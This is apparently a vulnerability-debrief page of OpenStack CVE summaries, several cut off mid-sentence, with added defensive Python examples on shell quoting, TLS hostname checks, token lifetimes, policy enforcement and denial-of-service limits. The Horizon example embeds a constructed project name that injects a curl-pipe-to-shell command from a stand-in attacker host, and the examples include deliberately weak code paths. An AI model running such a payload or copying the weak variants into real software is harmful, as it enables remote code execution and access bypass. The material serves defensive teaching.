PatchSiren

OpenStack CVE debriefs

These pages are published after PatchSiren validates generated defensive summaries against stored public CVE and source evidence.

MEDIUM OpenStack CVE published 2026-06-17

CVE-2026-55748

OpenStack Horizon versions before 25.7.4 are vulnerable to a script injection issue. The OpenStack RC file that Horizon generates for download is a shell script, and a crafted project name containing shell metacharacters can be written into it, where the shell interprets it when the file is sourced. The issue is considered a security hardening opportunity that addresses a class of user error rather than a traditional vulnerability. The CVSS score for this vuln [truncated]
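The following is an added example, not Horizon's code: it shows the unquoted interpolation that lets a project name carry shell syntax into a generated RC file, the quoted form, and a check that tokenises each line the way a POSIX shell would. The endpoint URL, user name and project names are constructed for the illustration.

```python
"""Quoting values written into a generated OpenStack RC file.

Added example, not Horizon's code: it shows why a project name that contains
shell metacharacters has to be quoted before it is interpolated into a script
users will `source`, and uses shlex to check the result the way the shell
would read it. The URL, user and project names are constructed.
"""
import re
import shlex

AUTH_URL = "https://keystone.example.net:5000/v3"   # assumed endpoint
USERNAME = "alice"
BENIGN_PROJECT = "demo"
# A constructed project name carrying a command separator and a pipe.
CRAFTED_PROJECT = "demo; curl http://attacker.example/x | sh"

_TEMPLATE = (
    "export OS_AUTH_URL={auth_url}\n"
    "export OS_USERNAME={username}\n"
    "export OS_PROJECT_NAME={project}\n"
)


def render_rc_unquoted(project, username=USERNAME, auth_url=AUTH_URL):
    """Interpolates values verbatim: the shell parses whatever they contain."""
    return _TEMPLATE.format(auth_url=auth_url, username=username, project=project)


def render_rc_quoted(project, username=USERNAME, auth_url=AUTH_URL):
    """Quotes each value so the shell sees it as one literal word."""
    return _TEMPLATE.format(
        auth_url=shlex.quote(auth_url),
        username=shlex.quote(username),
        project=shlex.quote(project),
    )


def shell_words(line):
    """Tokenises a line with POSIX rules, splitting out ; | & ( ) < > so a
    separator smuggled inside a value shows up as its own token."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


_ASSIGNMENT = re.compile(r"^OS_[A-Z0-9_]+=")


def is_safe_rc(rc_text):
    """True only if every non-blank line is exactly `export OS_NAME=<one word>`."""
    for line in rc_text.splitlines():
        if not line.strip():
            continue
        try:
            words = shell_words(line)
        except ValueError:          # unbalanced quote: the shell would choke too
            return False
        if len(words) != 2 or words[0] != "export" or not _ASSIGNMENT.match(words[1]):
            return False
    return True


if __name__ == "__main__":
    for render in (render_rc_unquoted, render_rc_quoted):
        text = render(CRAFTED_PROJECT)
        print(render.__name__, "safe" if is_safe_rc(text) else "UNSAFE")
        print(text)
```

The check deliberately enables shlex's punctuation splitting: with plain `shlex.split`, a name like `demo;id` survives as a single word and the injection goes unnoticed.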

MEDIUM OpenStack CVE published 2026-06-16

CVE-2026-46448

A vulnerability was discovered in OpenStack Nova before version 33.0.2. The server create API does not properly strip certain hint data, which can lead to an instance being created without a Placement allocation, so the resources it consumes are not accounted for by Placement. This issue has a CVSS score of 5.4 and is classified as MEDIUM severity.

MEDIUM OpenStack CVE published 2026-06-05

CVE-2026-50589

CVE-2026-50589 is a vulnerability in OpenStack Ironic 32 before 37.0.0. An unauthenticated attacker can submit a crafted JSON string to some endpoints of the API or JSON-RPC service and crash the service. The CVSS score for this vulnerability is 5.3, and the severity is MEDIUM.

LOW OpenStack CVE published 2026-06-04

CVE-2026-50266

CVE-2026-50266 is a security vulnerability in OpenStack Neutron that allows a project manager to bypass security group protections and enable spoofing on shared networks. A project manager can create or update a port on a shared network owned by another project and set device_owner to a value beginning with 'network:', such as 'network:dhcp'. The default port RBAC policies incorrectly included [truncated]

HIGH OpenStack CVE published 2026-06-04

CVE-2026-44393

CVE-2026-44393 is a HIGH severity vulnerability in OpenStack oslo.messaging 1.0.0 through 17.3.0. The RabbitMQ driver does not perform TLS hostname verification when connecting to the message broker. When `ssl_ca_file` is configured, the driver enables certificate chain validation but does not pass the expected broker hostname into the underlying TLS stack, so any certificate chaining to the configured CA is accepted regardless of the name it was issued for. This allows an attacker who can intercept contro [truncated]
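As an added example (not oslo.messaging's code), the block below contrasts a client TLS context that validates only the certificate chain with one that also binds the session to the expected broker name, and includes a small SAN matcher so the decision the hostname check makes is explicit. The host names and the CA file path are assumptions.

```python
"""TLS hostname verification for a broker connection.

Added example, not oslo.messaging's code. It contrasts a client context that
only validates the certificate chain with one that also binds the session to
the expected broker name, and includes a small SAN matcher to make explicit
what the hostname check decides. Host names and the CA file path are
assumptions.
"""
import socket
import ssl


def broker_tls_context(ca_file=None, verify_hostname=True):
    """Client context for the broker.

    verify_hostname=False reproduces the weak pattern: the chain is still
    validated against the CA, but any certificate that CA issued is accepted,
    whatever name it was issued for.
    """
    ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=ca_file)
    ctx.check_hostname = verify_hostname
    ctx.verify_mode = ssl.CERT_REQUIRED
    return ctx


def describe_context(ctx):
    """What the context will actually check, in a form fit for a startup log."""
    return {"chain": ctx.verify_mode == ssl.CERT_REQUIRED,
            "hostname": bool(ctx.check_hostname)}


def connect_broker(host, port, ctx, timeout=5.0):
    """server_hostname is the value the TLS stack compares against the
    certificate's SAN entries (and sends as SNI); omitting it is the bug."""
    raw = socket.create_connection((host, port), timeout=timeout)
    return ctx.wrap_socket(raw, server_hostname=host)


def hostname_matches(expected, san_dns_names):
    """Subset of RFC 6125 matching: labels compared case-insensitively, a
    wildcard only as the entire left-most label matching exactly one label,
    and no wildcards at the second level (e.g. '*.net' is refused)."""
    host = expected.rstrip(".").lower().split(".")
    for name in san_dns_names:
        pat = name.rstrip(".").lower().split(".")
        if len(pat) != len(host):
            continue
        if pat[0] == "*" and len(pat) < 3:
            continue
        if any("*" in label for label in pat[1:]):
            continue
        if all(p == "*" or p == h for p, h in zip(pat, host)):
            return True
    return False


def certificate_acceptable(expected_host, san_dns_names, verify_hostname):
    """Models the decision after chain validation has already passed."""
    if not verify_hostname:
        return True            # the weak context never looks at the name
    return hostname_matches(expected_host, san_dns_names)


if __name__ == "__main__":
    for flag in (False, True):
        print("verify_hostname=%s -> %s"
              % (flag, describe_context(broker_tls_context(verify_hostname=flag))))
    # A certificate issued by the same CA for a different host is accepted
    # by the weak context and rejected by the strict one.
    print(certificate_acceptable("rabbit.example.net", ["attacker.example.net"], False))
    print(certificate_acceptable("rabbit.example.net", ["attacker.example.net"], True))
```

With `check_hostname` enabled, Python's `ssl` refuses to wrap a socket at all unless `server_hostname` is supplied, which is a useful property to rely on: a driver that forgets the name fails at connect time rather than silently accepting any CA-issued certificate.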

MEDIUM OpenStack CVE published 2026-05-28

CVE-2026-49299

A policy name mismatch in OpenStack Neutron's tagging controller allows project readers to create and update resource tags. The controller enforces plural policy action names (e.g., 'create_tags') while the policy rules use singular names (e.g., 'create_tag'). Under Neutron's default policy, an action name with no matching rule is evaluated as allowed, granting project readers unauthorized write access to tags on same-project resources. This af [truncated]

MEDIUM OpenStack CVE published 2026-05-28

CVE-2026-44394

A vulnerability in OpenStack Keystone before 29.0.2 allows federated identity users to bypass token expiration policies through repeated token rescoping. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin fails to propagate the original token's expires_at value to the new token. The token provider then issues a replacemen [truncated]
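An added example, not Keystone's code, that models the difference between issuing a rescoped token with a fresh lifetime and clamping it to the original expiry, driven by a chain of rescopes of the kind described above. The TTL, user and project identifiers and timestamps are constructed.

```python
"""Token lifetime across rescoping.

Added example, not Keystone's code. A token is modelled as (scope, issued_at,
expires_at); rescoping either hands out a fresh lifetime or clamps the new
token to the original expiry. run_chain() drives repeated rescopes the way a
caller keeping a session alive indefinitely would. TTL and timestamps are
constructed.
"""
from dataclasses import dataclass, replace
from datetime import datetime, timedelta, timezone

TOKEN_TTL = timedelta(hours=1)                               # assumed provider default
START = datetime(2026, 5, 28, 12, 0, tzinfo=timezone.utc)   # constructed


@dataclass(frozen=True)
class Token:
    user_id: str
    scope: str
    issued_at: datetime
    expires_at: datetime


def issue_token(user_id, scope, now):
    return Token(user_id, scope, now, now + TOKEN_TTL)


def _require_unexpired(token, now):
    if now >= token.expires_at:
        raise PermissionError("token expired")


def rescope_fresh_lifetime(token, new_scope, now):
    """Weak form: the replacement gets a full TTL counted from now."""
    _require_unexpired(token, now)
    return issue_token(token.user_id, new_scope, now)


def rescope_preserving_expiry(token, new_scope, now):
    """Hardened form: the replacement never outlives the token it came from."""
    _require_unexpired(token, now)
    fresh = issue_token(token.user_id, new_scope, now)
    return replace(fresh, expires_at=min(fresh.expires_at, token.expires_at))


def run_chain(rescope, hops=6, interval=timedelta(minutes=30)):
    """Rescopes every `interval`; returns (rescopes completed, seconds of
    lifetime gained beyond the original token's expiry)."""
    token = issue_token("user-1", "project-a", START)
    original_expiry = token.expires_at
    now = START
    done = 0
    for i in range(hops):
        now += interval
        try:
            token = rescope(token, "project-b" if i % 2 == 0 else "project-a", now)
        except PermissionError:
            break
        done += 1
    gained = (token.expires_at - original_expiry).total_seconds()
    return done, int(gained)


if __name__ == "__main__":
    print("fresh lifetime:", run_chain(rescope_fresh_lifetime))
    print("preserving expiry:", run_chain(rescope_preserving_expiry))
```

With a one-hour TTL and a rescope every thirty minutes, the weak form completes all six hops and the final token expires three hours after the original would have; the clamped form completes one hop and the second is refused because the original expiry has passed.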

MEDIUM OpenStack CVE published 2026-05-28

CVE-2026-43000

A privilege escalation vulnerability in OpenStack Keystone before 29.0.2 allows an attacker with the member role on a project to escalate to admin privileges by chaining application credential impersonation with Keystone trusts. The vulnerability stems from improper authorization validation where Keystone validates delegated roles against the victim's actual role assignments in the database rather than th [truncated]

MEDIUM OpenStack CVE published 2026-05-28

CVE-2026-42999

An RBAC policy enforcement bypass vulnerability exists in OpenStack Keystone before version 29.0.2. The flaw resides in the `enforce_call` method, where the RBAC policy enforcer unconditionally merges the raw JSON request body into the policy enforcement dictionary via `policy_dict.update(json_input.copy())`. This operation overwrites trusted target data previously populated from database lookups. Because [truncated]
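The block below is an added example, not oslo.policy, Neutron or Keystone code. It is a deliberately small policy enforcer that reproduces the two properties the Neutron tagging debrief (CVE-2026-49299) and the Keystone enforce_call debrief (CVE-2026-42999) depend on: an unregistered action name falling through to a permissive default rule, and a request body merged into the policy target overwriting attributes loaded from the database. The rule strings, role names and identifiers are constructed and are not the projects' real defaults.

```python
"""Two ways an RBAC check can pass when it should not.

Added example, not oslo.policy, Neutron or Keystone code: a deliberately small
policy enforcer that reproduces the two properties the Neutron tagging and
Keystone enforce_call debriefs rely on. First, an action name with no
registered rule falls through to a permissive default ('create_tags' checked,
'create_tag' defined). Second, a request body merged into the policy target
overwrites attributes that were looked up from the database. Rule strings,
role names and IDs are constructed for the illustration, not the projects'
real defaults.
"""


class PolicyNotRegistered(Exception):
    pass


class Enforcer:
    """Rules are 'kind:value' atoms joined by ' and ' / ' or ' (and binds
    tighter); 'rule:<name>' references another rule."""

    def __init__(self, rules, default_rule="default"):
        self.rules = dict(rules)
        self.default_rule = default_rule

    def _atom(self, atom, target, creds):
        kind, _, value = atom.partition(":")
        if kind == "role":
            return value in creds.get("roles", ())
        if kind == "rule":
            return self._evaluate(self.rules[value], target, creds)
        try:   # generic check: caller attribute vs. (substituted) target attribute
            return str(creds.get(kind)) == value % target
        except KeyError:
            return False

    def _evaluate(self, expr, target, creds):
        return any(
            all(self._atom(a.strip(), target, creds) for a in clause.split(" and "))
            for clause in expr.split(" or ")
        )

    def enforce(self, action, target, creds):
        """Lenient: an action nobody registered is judged by the default rule."""
        expr = self.rules.get(action, self.rules[self.default_rule])
        return self._evaluate(expr, target, creds)

    def authorize(self, action, target, creds):
        """Strict: refuses to evaluate an unregistered action at all."""
        if action not in self.rules:
            raise PolicyNotRegistered(action)
        return self._evaluate(self.rules[action], target, creds)


# Constructed rule set: a permissive default plus two same-project write rules.
RULES = {
    "admin": "role:admin",
    "owner": "project_id:%(project_id)s",
    "default": "rule:admin or rule:owner",
    "create_tag": "role:admin or role:member and project_id:%(project_id)s",
    "update_port": "role:admin or role:member and project_id:%(project_id)s",
}


def tag_create_allowed(enforcer, creds, target, strict=False):
    """The controller checks the plural name, which no rule defines.
    Returns True/False, or None when the strict path rejects the name."""
    action = "create_tags"
    if not strict:
        return enforcer.enforce(action, target, creds)
    try:
        return enforcer.authorize(action, target, creds)
    except PolicyNotRegistered:
        return None


def policy_target_unsafe(db_target, json_body):
    """Body keys overwrite what was loaded from the database."""
    target = dict(db_target)
    target.update(json_body)
    return target


def policy_target_safe(db_target, json_body):
    """Body kept under its own key, so trusted attributes cannot be shadowed."""
    target = dict(db_target)
    target["body"] = dict(json_body)
    return target
```

The strict path corresponds to checking that every action name the controller uses is actually registered before it is evaluated (oslo.policy's `Enforcer.authorize` raises `PolicyNotRegistered` for exactly this reason); the namespaced target keeps request-controlled fields addressable by rules without letting them replace `project_id` and similar values that came from the database.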

HIGH OpenStack CVE published 2026-05-27

CVE-2026-49017

A denial-of-service vulnerability exists in OpenStack Swift's s3api middleware. The StreamingInput class enters an infinite loop when processing truncated aws-chunked PUT request bodies, causing proxy-server workers to become permanently unresponsive with escalating CPU and memory consumption. An authenticated attacker can exhaust all available proxy-server workers, resulting in complete service unavailab [truncated]
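As an added example, not Swift's s3api code, here is a decoder for the aws-chunked framing that treats a short read as a hard error instead of retrying it. The sample bodies are constructed with dummy chunk signatures; signature verification is out of scope and only the framing is handled.

```python
"""Decoding an aws-chunked request body without spinning on EOF.

Added example, not Swift's s3api code. The property demonstrated is EOF
handling: a reader that treats an empty read as "nothing yet" and retries
loops forever on a truncated body and pins a worker; this decoder treats a
short read as a hard error and also caps the decoded size. Chunk signatures
are not verified here (the sample values are constructed); only the framing
is handled.
"""
import io


class TruncatedBody(ValueError):
    pass


class BadChunkHeader(ValueError):
    pass


def _read_exact(stream, n):
    buf = bytearray()
    while len(buf) < n:
        piece = stream.read(n - len(buf))
        if not piece:                      # EOF mid-chunk: fail, never retry
            raise TruncatedBody("expected %d bytes, got %d" % (n, len(buf)))
        buf += piece
    return bytes(buf)


def _read_line(stream, limit=4096):
    buf = bytearray()
    while not buf.endswith(b"\r\n"):
        if len(buf) >= limit:
            raise BadChunkHeader("chunk header too long")
        byte = stream.read(1)
        if not byte:
            raise TruncatedBody("EOF inside chunk header")
        buf += byte
    return bytes(buf[:-2])


def decode_aws_chunked(stream, max_payload=64 * 1024 * 1024):
    """Decodes `<hex-size>;chunk-signature=<sig>\\r\\n<data>\\r\\n` chunks
    terminated by a zero-size chunk and returns the payload."""
    out = bytearray()
    while True:
        header = _read_line(stream)
        size_hex, _, ext = header.partition(b";")
        if not ext.startswith(b"chunk-signature="):
            raise BadChunkHeader(repr(header))
        try:
            size = int(size_hex, 16)
        except ValueError:
            raise BadChunkHeader(repr(header)) from None
        if size == 0:
            if _read_exact(stream, 2) != b"\r\n":
                raise BadChunkHeader("final chunk not terminated")
            return bytes(out)
        if len(out) + size > max_payload:
            raise ValueError("decoded payload exceeds cap")
        out += _read_exact(stream, size)
        if _read_exact(stream, 2) != b"\r\n":
            raise BadChunkHeader("missing CRLF after chunk data")


def build_body(chunks):
    """Constructs a well-formed aws-chunked body with dummy signatures."""
    sig = b"0" * 64
    parts = [b"%x;chunk-signature=%s\r\n%s\r\n" % (len(c), sig, c) for c in chunks]
    parts.append(b"0;chunk-signature=%s\r\n\r\n" % sig)
    return b"".join(parts)


def decode_bytes(data, max_payload=64 * 1024 * 1024):
    return decode_aws_chunked(io.BytesIO(data), max_payload)


def classify(data, max_payload=64 * 1024 * 1024):
    """Labels the outcome so a caller can map it to 400 / 413 / close."""
    try:
        decode_bytes(data, max_payload)
        return "ok"
    except TruncatedBody:
        return "truncated"
    except BadChunkHeader:
        return "bad-header"
    except ValueError:
        return "too-large"


if __name__ == "__main__":
    body = build_body([b"hello ", b"world"])
    print(decode_bytes(body))
    print(classify(body[:90]), classify(body[:-8]))
```

Every read path terminates on an empty read, a header over the length limit, or the payload cap, so a client that stops sending mid-chunk costs the worker one exception rather than a CPU core.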

MEDIUM OpenStack CVE published 2026-05-14

CVE-2026-44919

CVE-2026-44919 describes an availability issue in OpenStack Ironic image handling. In affected versions through 35.x before commit a3f6d73, an image URL such as file:///dev/zero names a device that never reaches end of file, so the checksum calculation loops indefinitely, potentially consuming worker resources and delaying image-related operations.
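An added example, not Ironic's code, of checksumming a file:// image source defensively: the URL is resolved to a local path, anything that is not a regular file is refused after `fstat` on the opened handle, and a byte cap is enforced both from the reported size and while hashing. The size cap and the sample file contents are assumptions.

```python
"""Checksumming a file:// image source without reading forever.

Added example, not Ironic's code. A file:// URL may name something that is
not a regular file (a character device such as /dev/zero, a FIFO) and whose
reads never reach EOF. This routine resolves the URL, refuses anything that
is not a regular file, and enforces a byte cap both from the size reported by
fstat and while hashing. The size cap and sample data are assumptions.
"""
import hashlib
import os
import stat
import tempfile
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import url2pathname


class UnsafeImageSource(ValueError):
    def __init__(self, reason, detail):
        super().__init__("%s: %s" % (reason, detail))
        self.reason = reason


def path_from_file_url(url):
    parsed = urlparse(url)
    if parsed.scheme != "file" or parsed.netloc not in ("", "localhost"):
        raise UnsafeImageSource("not-file-url", url)
    return url2pathname(parsed.path)


def checksum_file_url(url, algorithm="sha256", max_bytes=8 * 1024 ** 3, chunk=1 << 20):
    path = path_from_file_url(url)
    # O_NONBLOCK so that opening a FIFO does not hang waiting for a writer;
    # it has no effect on regular files.
    fd = os.open(path, os.O_RDONLY | getattr(os, "O_NONBLOCK", 0))
    try:
        st = os.fstat(fd)                  # fstat on the open handle, not a racy stat()
        if not stat.S_ISREG(st.st_mode):
            raise UnsafeImageSource("not-regular", path)
        if st.st_size > max_bytes:
            raise UnsafeImageSource("too-large", "%d > %d bytes" % (st.st_size, max_bytes))
    except BaseException:
        os.close(fd)
        raise
    digest = hashlib.new(algorithm)
    read = 0
    with os.fdopen(fd, "rb") as fh:
        while True:
            data = fh.read(chunk)
            if not data:
                break
            read += len(data)
            if read > max_bytes:           # file grew, or size was misreported
                raise UnsafeImageSource("too-large", "read exceeded %d bytes" % max_bytes)
            digest.update(data)
    return digest.hexdigest()


def classify_source(url, max_bytes=8 * 1024 ** 3):
    """Maps the outcome to a short label a caller can log or turn into an error."""
    try:
        checksum_file_url(url, max_bytes=max_bytes)
        return "ok"
    except UnsafeImageSource as exc:
        return exc.reason
    except OSError:
        return "unreadable"


def make_sample_file(content):
    """Writes constructed sample bytes to a temp file; returns its file:// URL."""
    with tempfile.NamedTemporaryFile("wb", delete=False, suffix=".img") as fh:
        fh.write(content)
    return Path(fh.name).resolve().as_uri()


def temp_directory_url():
    return Path(tempfile.gettempdir()).resolve().as_uri()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    if os.path.exists("/dev/zero"):
        print("/dev/zero ->", classify_source("file:///dev/zero"))
    url = make_sample_file(b"constructed image bytes " * 4096)
    print(url, "->", checksum_file_url(url))
```

The in-loop cap matters even after the `fstat` size check: a regular file can be appended to while it is being hashed, and the reported size of some pseudo-files is zero.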

LOW OpenStack CVE published 2026-05-08

CVE-2026-44916

CVE-2026-44916 is a low-severity issue in OpenStack Ironic affecting versions before 35.0.2 in a certain non-default configuration. The published description says instance_info['ks_template'] is rendered without sandboxing. Public records show the CVE was first published on 2026-05-08 and later modified on 2026-05-20, with references to a Launchpad bug, an OpenStack security advisory, and an oss-security [truncated]

HIGH OpenStack CVE published 2026-05-05

CVE-2026-42997

A high-severity vulnerability was discovered in OpenStack Ironic, the OpenStack bare metal provisioning service. The issue allows users to request that authorization be sent to a remote endpoint during import operations, potentially exposing sensitive credentials. The vulnerability has a CVSS score of 7.7 and is rated HIGH severity. The affected versions of Ironic are 17.0.0 to 26.1.6, 27.0.0 to 29.0.5 [truncated]

MEDIUM OpenStack CVE published 2026-04-28

CVE-2026-42510

CVE-2026-42510 affects OpenStack Ironic before 35.0.1. In a non-default configuration that includes the console interface, the issue can allow ipmitool execution. The supplied CVSS data rates it Medium (6.6), but the impact is significant: the vector indicates network reachability, no user interaction, and high confidentiality, integrity, and availability impact, with the score held down only by the high privileges required.

LOW OpenStack CVE published 2026-04-10

CVE-2026-33551

A low-severity vulnerability was discovered in OpenStack Keystone, affecting versions 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. The issue allows an authenticated user with only a reader role to create EC2 credentials using a restricted application credential, potentially bypassing role restrictions.

MEDIUM OpenStack CVE published 2017-01-12

CVE-2016-5737

CVE-2016-5737 is a cross-site scripting issue in the Gerrit configuration managed by OpenStack's puppet-gerrit module. text/html is incorrectly marked as a safe mimetype, which lets a crafted review render as active HTML in a user's browser. The issue was publicly recorded by NVD on 2017-01-12, with a patch reference already available in the upstream commit and oss-security disclosure referenced by the CVE record.